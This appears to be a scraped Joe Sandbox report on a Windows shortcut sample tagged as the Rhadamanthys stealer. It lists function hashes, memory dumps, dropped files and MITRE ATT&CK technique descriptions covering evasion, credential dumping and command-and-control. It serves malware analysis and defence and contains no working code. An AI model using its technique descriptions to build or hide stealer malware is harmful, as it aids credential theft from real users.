String ID:
API String ID: 2962429428-0
Opcode ID: d0a462f04c941b5b32d0d3707874af4f94b5957b79f4ef2077f52d904a13b6a9
Instruction ID: 868c50bf1cf6489a999720485d856315d97fcb147b6ddc07a906c02771889d52
Opcode Fuzzy Hash: d0a462f04c941b5b32d0d3707874af4f94b5957b79f4ef2077f52d904a13b6a9
Instruction Fuzzy Hash: 1FF04422E0884582EA35E696E6453B95290EB84F94F045431EB5D83BD5EF2CEDC2E710

Function 00007FF63D267E30 Relevance: 5.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF63D267E52
CloseHandle.KERNEL32 ref: 00007FF63D267E62
CloseHandle.KERNEL32 ref: 00007FF63D267E72
CloseHandle.KERNEL32 ref: 00007FF63D267E7A

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: d3428f1d18ea7f16bbf651ebddb4d5a6dda2196743fbc2f30ef966f6f9ec0f8f
Instruction ID: e9e94dee55833955b1ef7fcebbbfa8bdbe0ed6f633e93e1c5ee630392f5b9d74
Opcode Fuzzy Hash: d3428f1d18ea7f16bbf651ebddb4d5a6dda2196743fbc2f30ef966f6f9ec0f8f
Instruction Fuzzy Hash: E8F09622A0494885E625EE66E5007BC13A0EB84F8CF141031EF0C87B95DF3CDDC6D301

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report fBcMVl6ns6.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Rhadamanthys

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\ajbs50ul.bat

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\regsvr32.EXE.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aeczgi43.tht.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2ctgb41.zc3.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bnkewsjx.th4.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cbrff2b0.uox.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkvuje5c.ujv.ps1

Windows Analysis Report
fBcMVl6ns6.lnk

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre